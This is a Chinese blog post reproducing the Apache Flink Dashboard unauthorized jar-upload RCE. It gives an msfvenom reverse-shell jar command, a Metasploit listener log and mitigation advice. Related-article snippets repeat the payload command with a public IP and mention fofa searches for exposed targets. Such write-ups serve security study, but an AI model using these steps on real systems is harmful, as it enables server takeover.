Apache Flink未授权访问-远程代码命令执行-复现

最新推荐文章于 2024-06-09 16:06:06 发布
最新推荐文章于 2024-06-09 16:06:06 发布
阅读量569 收藏 2
点赞数
文章标签: java 安全 http linux 大数据
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37602797/article/details/117811767
版权

v2-f1ad56bf3115dbcbafee9b4319b8fdda_b.jpg


​好久没更新了,今天趁1024更新一篇,最近工作中遇到这个漏洞,今天自己来做一下这个漏洞复现。

Apache Flink未授权访问-远程代码命令执行-复现


v2-e898c86a9f407697d5f7678d22fbb447_b.jpg


一、漏洞简介

Apache Flink Dashboard默认没有用户权限认证。攻击者可以通过未授权的Flink Dashboard控制台,直接上传木马jar包,可远程执行任意系统命令获取服务器权限,风险极大。

二、影响版本

Apache Flink <= 1.9.1(最新版本)

三、漏洞复现

1、生成反弹jar包

msfvenom-p java/meterpreter/reverse_tcp LHOST=XX.XX.XX.XX LPORT=4444-f jar > rce.jar


v2-b82384ed042a1c4457f5b10f295c84fa_b.png


2、msf设置监听

msf5> use exploit/multi/handler [*]Using configured payload generic/shell_reverse_tcpmsf5exploit(multi/handler) > set payload java/shell/reverse_tcp payload=> java/shell/reverse_tcpmsf5exploit(multi/handler) > show options ​Moduleoptions (exploit/multi/handler):​NameCurrent Setting Required Description------------------- -------- -----------​​Payloadoptions (java/shell/reverse_tcp):​NameCurrent Setting Required Description------------------- -------- -----------LHOSTyes The listen address (an interface may be specified)LPORT4444 yes The listen port​​Exploittarget:​IdName------0Wildcard Target​​msf5exploit(multi/handler) > set LHOST XX.XX.XX.XXLHOST=> XX.XX.XX.XXmsf5exploit(multi/handler) > exploit ​[*]Started reverse TCP handler on XX.XX.XX.XX:4444


v2-e31c7bf8f9c7eeeaf1c55cae10eda266_b.jpg


3、上传 Jar包,并且提交


v2-2f84d27815e6a9322c7290602270734f_b.jpg


监听接受反弹的shell,获取权限


v2-c68a4e87412b2d23b5dd32180e7eb2df_b.jpg


四、安全建议

1. 请关注Apache Flink官方以便获取更新信息:flink.apache.org/

2.针对ApacheFlinkDashboard设置防火墙策略(禁止Dashboard对外访问,或者确保只对可信端点开放), 仅允许白名单IP进行访问,并在Web代理中增加对该服务的Digest认证,防止未授权访问。关于认证设置可参考链接:

httpd.apache.org/docs/2

五、参考连接

llidc.com/news/858.html

nitec.jhun.edu.cn/da/64

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!


v2-c80c87cb78cf66222785b2baa2a6c6f9_b.jpg


个人知乎:zhihu.com/people/fu-wei

个人简书:jianshu.com/u/bf0e38a8d

个人CSDN:blog.csdn.net/qq_376027

原文连接:mp.weixin.qq.com/s/aomC


v2-e0038f5515df1ac5006bb633bd45db6e_b.jpg

thelostworld-公众号
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
Apache Flink 授权远程代码执行提权(实战)
失心少年
12-04 1197
1、fofa 搜索 app=“Apache-Flink” 可以看到有上千个 2、生成木马 下面展示一些 。 msfvenom -p java/meterpreter/reverse_tcp LHOST=47.103.79.70 LPORT=4444 -f jar > rce.jar 3、打开msf 进行如下配置,并进行监听 下面展示一些 。 3、上传刚才生成的木马,并执行 4、看到shell已经反弹回来 5、通过id 、 whoami 、cat /etc/passwd等命令查看当前用户及权
gitee 上传jar包_【Apache Flink漏洞复现授权访问&上传jar包getshell
weixin_29820757的博客
01-18 538
一漏洞介绍Apache Flink Dashboard默认没有用户权限认证攻击者可以通过授权Flink Dashboard控制台直接上传木马jar包可远程执行任意系统命令获取服务器权限二影响范围Apache Flink <= 1.9.1三漏洞检测正文fofa搜索:app="Apache Flink"默认端口为8081poc.pyimport sysimport jsonimpo...
[漏洞复现]Apache Flink授权访问+远程代码命令执行
cj_Hydra's Blog
10-24 2566
前言: 近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞,影响范围:<= 1.9.1(最新版本) 但是作者通过测试在版本Version: 1.11.2也是受影响的,此次复现就是通过版本Version: 1.11.2进行复现利用。 漏洞复现: 首先通过msfveon生成jar包,命令: msfvenom -p java/meterpreter/reverse_tcp LHOST=公网IP地址 LPORT=监听端口 -f jar > rce.jar 然
flink
zyzn1425077119的博客
10-29 182
参考:https://blog.csdn.net/lp284558195/article/details/92798595 https://baike.baidu.com/item/flink/9078426?fr=aladdin Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。 ...
Apache Flink 授权远程代码执行检查
weixin_42299610的博客
06-07 1712
Apache Flink 授权远程代码执行检查
Apache Flink 授权访问+远程代码执行
Adminxe的博客
11-12 1000
0x00 前言 @Adminxe 今天胖胖表哥突然扔来一个复现,那俺得瞧瞧,正好写个博客划划水,然后就引发了下面一些列的操作以及你想看到的,以及和你不想看到的文字。之前就有大佬复现过,毕竟水文和复现学习,那就来一波吧!最可恶的是,今天的MC兄没有请客喝啵啵奶茶,必须点名批评一下! 从现在fofa的搜索量来看,基本也就是国内Apache Flink 存在1500左右的站点。 有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞,影响范围: <= 1.9.1(最..
Apache Flink漏洞复现(授权访问&上传jar包getshell)
qq_43244584的博客
01-26 4135
Apache Flink漏洞复现(授权访问&上传jar包getshell) 一、Flink简介 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。 二、漏洞介绍 ​ Apache Flink Dashboard默认没有用户权限认证 ​ 攻击者可以通过授权Flink Dashboard控制台 ​ 直接上传木马jar包 ​ 可远程执行任意系统命令获取服务器权限
Apache-flink 授权访问任意jar包上传反弹shell.MD
04-12
Apache-flink 授权访问任意jar包上传反弹shell
Apache Flink 授权访问+远程代码执行.pdf
04-30
Apache Flink 授权访问+远程代码执行.pdf,该漏洞可以上传任意Jar包导致远程代码执行
apache-doris-flink-connector-1.13_2.12-1.0.3
05-05
Flink Doris Connector 源码(apache-doris-flink-connector-1.13_2.12-1.0.3-incubating-src.tar.gz) Flink Doris Connector Version:1.0.3 Flink Version:1.13 Scala Version:2.12 Apache Doris是一个现代...
apache-doris-flink-connector-1.11_2.12-1.0.3
05-05
Flink Doris Connector(apache-doris-flink-connector-1.11_2.12-1.0.3-incubating-src.tar.gz) Flink Doris Connector Version:1.0.3 Flink Version:1.11 Scala Version:2.12 Apache Doris是一个现代MPP分析...
getshell之Apache Flink 授权访问+远程代码执行
MoCoCN的博客
11-12 810
@[MoCo](getshell之Apache Flink 授权访问+远程代码执行) 0x00前言 又是领导不在的一天,今天兄弟们就是天,随着工作的时间越来越久对知识的渴望也越来越强大,最近几天在看反弹shell的一些文章,也学习到了一些反弹shell技巧和姿势,由于环境的问题,暂不能记录文本,虽说都是一些基本的吧,慢慢来嘛,看着文章,吐槽的国内某知名的培训机构,努力的汲取知识,看着看着就累了,有点看不动了,但是还是想学,于是决定去看看adminxe大佬的博客上看看有没有发布新的文章,看见大佬昨天发布了一
2020-10-24Apache Flink授权访问-远程代码命令执行-复现
thelostworld
10-24 985
​好久没更新了,今天趁1024更新一篇,最近工作中遇到这个漏洞,今天自己来做一下这个漏洞复现Apache Flink授权访问-远程代码命令执行-复现 一、漏洞简介 Apache Flink Dashboard默认没有用户权限认证。攻击者可以通过授权Flink Dashboard控制台,直接上传木马jar包,可远程执行任意系统命令获取服务器权限,风险极大。 二、影响版本 Apache Flink <= 1.9.1(最新版本) 三、漏洞复现 1、生成反弹jar包 msfv..
flinkdashboard授权
someInNeed的博客
10-16 1206
访问 http://172.16.150.xx:8084。然后目录在/usr/local/nginx。flinkwebui 增加账号密码。添加配置完成以后,重启nginx,修改flink.conf。配置nginx.conf。
【漏洞修复】修复 Apache Flink Web Dashboard 授权访问远程命令执行漏洞
RobinWang的博客
01-15 7570
【漏洞修复】修复 Apache Flink Web Dashboard 授权访问远程命令执行漏洞 介绍 攻击者通过Flink Web Dashboard上传含有恶意代码的jar包进行攻击,中招会使服务器占满CPU沦为挖矿机,非常猖獗 通过反编译得到的恶意代码: package com.example; import java.io.IOException; public class Mai...
【CVE】CVE-2020-17518 & CVE-2020-17519:Flink 任意文件上传 & 授权访问
边扯边淡
05-09 2501
起序:漏扫完看报告的时候发现的,复现学习一下。 一、靶场环境 使用的是 github 上的 vulhub 环境。因为 Flink 中的 CVE-2020-17518 和 CVE-2020-17519 在 Flink/1.11.2 版本都存在。 vulhub:https://github.com/vulhub/vulhub 1、漏洞描述:任意文件上传 & 授权访问 CVE 编号 名称 危害 CVE-2020-17518 任意文件上传 应用系统在文件上传功能处对用户上传.
简单的项目部署脚本(转载)
最新发布
u010230019的博客
06-09 704
有些项目团队喜欢使用docker启动java服务,那么我们同样可以将上述脚本稍做改造,来实现基于shell+docker的简单项目部署能力。可以将核心节点的错误或者失败内容通过webhook发送到对应的告警平台,比如钉钉、飞书机器人等。把~/.ssh/id_rsa.pub内容添加到远程仓库的ssh秘钥中。执行start.sh脚本打包部署。start.sh脚本内容。
-bash: flink: 找到命令
04-24
-bash: flink: 找到命令 是一个命令行提示,表示在当前环境中找不到名为"flink"的命令。这通常是因为你没有安装或者配置正确的软件包。 Flink是一个开源的流处理和批处理框架,它提供了高效、可扩展和容错的数据处理能力。如果你想在命令行中使用Flink,你需要先安装Flink并将其添加到系统的环境变量中。 以下是一些可能的解决方法: 1. 确保你已经正确安装了Flink。你可以从Flink官方网站下载并按照它们的安装指南进行安装。 2. 检查你的环境变量配置是否正确。在命令行中输入`echo $PATH`,确保Flink的安装路径已经包含在其中。 3. 如果你已经正确安装了Flink但仍然无法找到命令,可能是因为你没有以正确的方式启动Flink。请参考Flink的文档,了解如何正确启动和使用Flink

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值